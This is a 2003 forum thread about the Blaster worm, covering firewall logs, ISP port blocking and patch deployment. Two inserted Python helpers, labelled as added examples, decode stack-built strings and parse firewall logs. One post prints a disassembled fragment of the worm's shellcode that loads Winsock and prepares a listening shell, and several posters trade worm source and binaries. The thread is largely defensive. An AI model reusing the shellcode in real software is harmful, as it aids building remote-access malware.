
Thread: RPC/DCOM/mblast.exe thread discussions/notices

  1. #71
    Anyone with access to BBC 1, looks like they are going to do a piece on msblast in a few mins on the news.

  2. #72
    The Doctor Und3ertak3r | Join Date: Apr 2002 | Posts: 2,744
    Quote: Anyone with access to BBC 1, looks like they are going to do a piece on msblast in a few mins on the news
    bugger... missed it...!!!

    Checking my firewall logs this morning.. yeh it is 8am here.. absolutely no hits on port 135, 69, 137 in the last 2.5 hrs.. get the feeling the ISP is blocking those ports.. I wonder how many others are doing the same..

    Cheers
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  3. #73
    Senior Member nihil | Join Date: Jul 2003 | Location: United Kingdom: Bridlington | Posts: 17,188
    I use two ISPs...............as of 06.00GMT today (14 August) FreeUK appeared to be doing this. My other one (Tiscali) was not, and I was getting a lot of hits up until about 2 hours ago (21.30Hrs GMT).

    I did post (and got told off for!) the info that lavasoft have an update for Ad-aware that detects this malware..............also found a couple of other bad guys on my box, so it is worth the effort.........

    This is newer than my last Ad-aware update post BTW

    Cheers

    Johnno

  4. #74
    PHP/PostgreSQL guy | Join Date: Dec 2001 | Posts: 1,164
    What I've done is (for windows machines that don't need to use RPC, like my own machines at home) route port 135 through my router to an internal IP address that doesn't exist. In the VERY unlikely event that I got this thing, it wouldn't be able to communicate to the outside because the port it's trying to come back through would go to a null destination. Of course, mandatory updates on antivirus is already done as is updating Microsoft's OS line.

    If anyone out there needs to automate the patching for a lot of windows machines, you can do this:

    1: Download the Windows 2000 patch or the Windows XP patch. Save it to the desktop.

    2: Rename said patch to patch.exe or something similar. It will make the next step easier.

    3: Create a new file on the desktop called autorun.inf. Open it in notepad and put the following lines in:

    Code:
    [autorun]
    open=patch.exe -o -f -u

    4: Burn these two files to a CD. Because of the autorun.inf and Windows' inherent autoplay feature, the patch will automatically run. The -o means it will overwrite existing files, the -f means it will force all processes to die upon reboot signal, and the -u means it will be in unattended mode, which makes life a lot easier for administrators running around trying to automate this process on dozens or more workstations.

    Problem: it has to be run as administrator (or power users that can add patches to the system) so it's only a little better if you have dozens of regular standard user workstations.
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.

  5. #75
    Junior Member | Join Date: Oct 2001 | Posts: 13
    Just got my hands on the source code for the Blaster worm now.
    Got it from a good friend in my mail some hours ago, so soon I'm gonna have some fun examining it and seeing how it's made.

  6. #76
    Junior Member | Join Date: Feb 2003 | Posts: 1
    Grinler..anyone

    I am trying to find a binary or source code source for the W32/Blaster to put it into our lab for testing. Unfortunately the gov. agency we support will not allow the Ops support staff to change any machine until in-house testing for effect is completed. Bureaucracy, ya gotta love it.

  7. #77
    I got the binary but unfortunately do not have access to the computer it's stored on due to the power outage.

    Zrekam, Mind sharing the source? Would love to take a look at it.

  8. #78
    Junior Member | Join Date: Oct 2001 | Posts: 13
    here is a snippet of the worm's exploit code:

    Code:
    loc_4AF:                        ; CODE XREF: seg000:000004A8j
    sub     esp, 34h
    mov     esi, esp
    call    GetKernel32BaseAddy
    mov     [esi], eax              ; EAX is the base address of kernel32.dll
    push    dword ptr [esi]
    push    0EC0E4E8Eh              ; corresponds to LoadLibraryA
    call    ScanForAPI
    mov     [esi+8], eax
    push    dword ptr [esi]
    push    0CE05D9ADh              ; WaitForSingleObject
    call    ScanForAPI
    mov     [esi+0Ch], eax
    push    6C6Ch
    push    642E3233h
    push    5F327377h               ; "ws2_32.dll" built on the stack
    push    esp
    call    dword ptr [esi+8]       ; LoadLibraryA
    mov     [esi+4], eax            ; esi+4 = HMODULE of ws2_32.dll
    push    dword ptr [esi]
    push    16B3FE72h               ; CreateProcessA
    call    ScanForAPI
    mov     [esi+10h], eax
    push    dword ptr [esi]
    push    73E2D87Eh               ; ExitProcess
    call    ScanForAPI
    mov     [esi+14h], eax
    push    dword ptr [esi+4]
    push    3BFCEDCBh               ; WSAStartup
    call    ScanForAPI
    mov     [esi+18h], eax
    push    dword ptr [esi+4]
    push    0ADF509D9h              ; WSASocketA
    call    ScanForAPI
    mov     [esi+1Ch], eax
    push    dword ptr [esi+4]
    push    0C7701AA4h              ; bind
    call    ScanForAPI
    mov     [esi+20h], eax
    push    dword ptr [esi+4]
    push    0E92EADA4h              ; listen
    call    ScanForAPI
    mov     [esi+24h], eax
    push    dword ptr [esi+4]
    push    498649E5h               ; accept
    call    ScanForAPI
    mov     [esi+28h], eax
    push    dword ptr [esi+4]
    push    79C679E7h               ; closesocket
    call    ScanForAPI
    mov     [esi+2Ch], eax
    xor     edi, edi
    sub     esp, 190h
    push    esp
    push    101h
    call    dword ptr [esi+18h]     ; WSAStartup returns 0 if successful
    push    eax
    push    eax
    push    eax
    push    eax
    inc     eax
    push    eax
    inc     eax
    push    eax                     ; call WSASocketA

    This is just a little bit of the blaster worm, the rest of the code I am not allowed to reveal.
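An added example, not code from the post or from the worm: a small Python helper that recovers the string the three `push` immediates in the disassembly above build on the stack, so an analyst can verify the DLL name rather than trust the comment. It generalises to any run of `push imm32` that ends in `push esp`; the excerpt it runs on is a constructed subset of the posted listing.

```python
import re

# Constructed excerpt of the disassembly quoted in this post (a few lines only).
DISASM = """\
mov [esi+0Ch], eax
push 6C6Ch
push 642E3233h
push 5F327377h
push esp
call dword ptr [esi+8]
mov [esi+4], eax
sub esp, 190h
push esp
push 101h
call dword ptr [esi+18h]
"""

# `push 5F327377h`: an immediate in MASM-style hex with a trailing `h`.
PUSH_IMM = re.compile(r"^\s*push\s+([0-9A-Fa-f]+)h\b", re.IGNORECASE)
PUSH_ESP = re.compile(r"^\s*push\s+esp\b", re.IGNORECASE)


def decode_run(immediates):
    """Turn a list of pushed DWORDs into the string they form on the stack.

    Each DWORD is stored little-endian, and the last push lands at the lowest
    address, so the run is reversed across DWORDs and read up to the first NUL.
    """
    raw = b"".join(v.to_bytes(4, "little") for v in reversed(immediates))
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def find_stack_strings(asm):
    """Return every string built by a run of `push imm32` that ends in `push esp`."""
    found, run = [], []
    for line in asm.splitlines():
        m = PUSH_IMM.match(line)
        if m:
            run.append(int(m.group(1), 16))
        elif PUSH_ESP.match(line) and run:
            found.append(decode_run(run))  # `push esp` passes the string pointer
            run = []
        else:
            run = []  # any other instruction breaks the run
    return found


if __name__ == "__main__":
    print(find_stack_strings(DISASM))  # ['ws2_32.dll']
```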

  9. #79
    rebmeM roineS enilnOitnA steve.milner | Join Date: Jul 2003 | Posts: 1,021
    Originally posted here by Und3ertak3r
    Noticed an increase in scans on the netbios ports, 137 in particular, as well almost matching the 135? coincidence?

    Cheers
    I've started getting hits, just like blaster on port 137 at around 8.00pm UTC last night & at the rate of every 10/15 mins.

    Anyone know what this is?

    Edit: Actually the starting time may be wrong, but I'd still like to know what this is.
    IT, e-commerce, Retail, Programme & Project Management, EPoS, Supply Chain and Logistic Services. Yorkshire. http://www.bigi.uk.com

  10. #80
    The Doctor Und3ertak3r | Join Date: Apr 2002 | Posts: 2,744
    My ISP has decided to UN-Block Port 135..
    My firewall log is full of "Block TCP packet on port 135" .. this restarted sometime yesterday (local time) and the Port 135 probes here are as bad as during the 11th and 12th.. I don't want to exaggerate.. it seems at the moment to be worse.. but.. I didn't run my system 24/7 at that time..

    I have taken the steps of advising the ISP, and asking why they removed the block, also asking that it may be prudent to re-block port 135..
    and just for their records I supplied a short extract from my logs (about 5k).. that should give them enough food for thought.. or at least some emailing to the users of those systems "You are infected" warnings.. Most of the IPs are from within their domains.. ie 144.134.XXX.XXX

    I wonder how many other ISPs have decided to unblock that port.. certainly shows (from here) the infection is still rampant..

    Cheers
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
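An added example (not from the thread) that automates what the two firewall-log posts above did by hand: it parses constructed log lines in the style of the quoted "Block TCP packet on port 135" entries, counts hits on the ports the thread ties to the worm (135, 69, 137) per source and per /16, and pulls out the lines for one ISP's range as the extract to send its abuse desk. The log line layout and the sample addresses are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines in the style of the firewall entries quoted in the
# thread; the field layout is an assumption, not a real product's format.
SAMPLE_LOG = """\
2003-08-15 07:58:12 Block TCP packet on port 135 from 144.134.17.22:3421
2003-08-15 07:58:40 Block TCP packet on port 135 from 144.134.201.9:1094
2003-08-15 07:59:03 Block UDP packet on port 137 from 203.0.113.44:137
2003-08-15 07:59:51 Block TCP packet on port 135 from 144.134.17.22:3422
2003-08-15 08:00:17 Block UDP packet on port 69 from 198.51.100.7:2048
2003-08-15 08:00:30 Block TCP packet on port 80 from 198.51.100.200:40000
2003-08-15 08:01:02 Block TCP packet on port 135 from 144.134.88.130:1031
"""

# Ports the thread associates with the worm's probing and payload fetch.
WORM_PORTS = {135, 69, 137}

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) Block (?P<proto>TCP|UDP) packet on port (?P<port>\d+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)$"
)

def worm_hits(text):
    """Yield (timestamp, src_ip, port) for worm-port lines; ignore everything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and int(m["port"]) in WORM_PORTS:
            yield m["ts"], m["src"], int(m["port"])

def summarise(text):
    """Count hits per source IP and per /16, the granularity an ISP is likely to own."""
    per_ip, per_prefix = Counter(), Counter()
    for _ts, src, _port in worm_hits(text):
        per_ip[src] += 1
        per_prefix[".".join(src.split(".")[:2])] += 1
    return per_ip, per_prefix

def abuse_extract(text, prefix):
    """Return the raw log lines for one /16, i.e. the extract to send that ISP."""
    return [line for line in text.splitlines()
            if (m := LINE_RE.match(line.strip()))
            and int(m["port"]) in WORM_PORTS
            and m["src"].startswith(prefix + ".")]

if __name__ == "__main__":
    per_ip, per_prefix = summarise(SAMPLE_LOG)
    for prefix, n in per_prefix.most_common():
        print(f"{prefix}.x.x: {n} worm-port hits")
    print("\n".join(abuse_extract(SAMPLE_LOG, "144.134")))
```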
